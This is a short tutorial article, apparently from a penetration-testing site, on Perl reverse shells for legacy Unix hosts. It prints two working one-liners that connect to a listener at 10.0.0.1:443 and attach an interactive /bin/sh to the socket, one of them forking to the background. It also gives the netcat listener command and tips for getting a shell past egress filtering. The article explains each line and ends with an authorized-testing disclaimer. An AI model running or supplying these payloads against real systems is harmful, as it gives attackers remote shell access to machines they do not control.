Skip to content
reverseshell

Perl Reverse Shell: The One-Liner That Works on Ancient Boxes

How the perl reverse shell works with the Socket module, the classic one-liner, and why Perl is the fallback on legacy Unix systems.

Published on 2 min read
perlreverse-shelllinux

Perl is the survivor's interpreter. Long after a minimal container drops python and a hardened box loses nc -e, an old Unix system, a network appliance, or a legacy CGI host still has Perl. That is exactly when the perl reverse shell earns its place in your notes.

The Classic One-Liner

perl -e 'use Socket;$i="10.0.0.1";$p=443;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

Step by step:

  • use Socket pulls in the networking constants and helpers.
  • socket(S,...) creates a TCP socket; connect(S, sockaddr_in($p, inet_aton($i))) dials your listener at $i:$p.
  • open(STDIN,">&S"), open(STDOUT,">&S"), open(STDERR,">&S") point the three standard streams at the socket S.
  • exec("/bin/sh -i") replaces Perl with an interactive shell wired to that socket.

Catch it with nc -lvnp 443. It is verbose because Perl makes you build the socket explicitly, but it depends only on the core Socket module, which is always present.

A Shorter IO::Socket Variant

If IO::Socket::INET is available, the payload shrinks and can fork to the background:

perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"10.0.0.1:443");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'

The fork detaches it, which is handy when you are running it through a context that would otherwise block.

When It Won't Connect

  1. No Perl — rare on traditional Unix, but check which perl. Fall back to bash or netcat.
  2. Quoting — the -e script is single-quoted; nested single quotes break it. See payload quoting.
  3. Egress filtered — prefer 443/80; test per egress filtering.
  4. Listener mismatch — see choosing a listener.

Full triage: why reverse shells fail.

Generate It

The reverse shell generator produces the perl one-liner with your LHOST/LPORT set and the matching listener attached — useful precisely when you have landed on a legacy box and want the syntax right the first time.

Authorized Testing Only

Use perl reverse shells only against systems you own or are explicitly authorized to test. The technique is identical regardless of intent; authorization is what makes it legitimate.

Related articles

Bash Reverse Shell One-Liners: How /dev/tcp Actually Works
The common bash reverse shell one-liners explained line by line, why they need bash (not sh), and how to fall back when /dev/tcp is missing.
bashreverse-shelllinux
Python Reverse Shell: One-Liners That Survive python vs python3
How the python reverse shell one-liner works with socket and pty, why the python/python3 split breaks payloads, and a version-agnostic fallback.
pythonreverse-shelllinux
Ruby Reverse Shell: One-Liners for Boxes That Run Rails
How a ruby reverse shell works with the socket library, the common one-liners, and when Ruby is the interpreter you can count on.
rubyreverse-shelllinux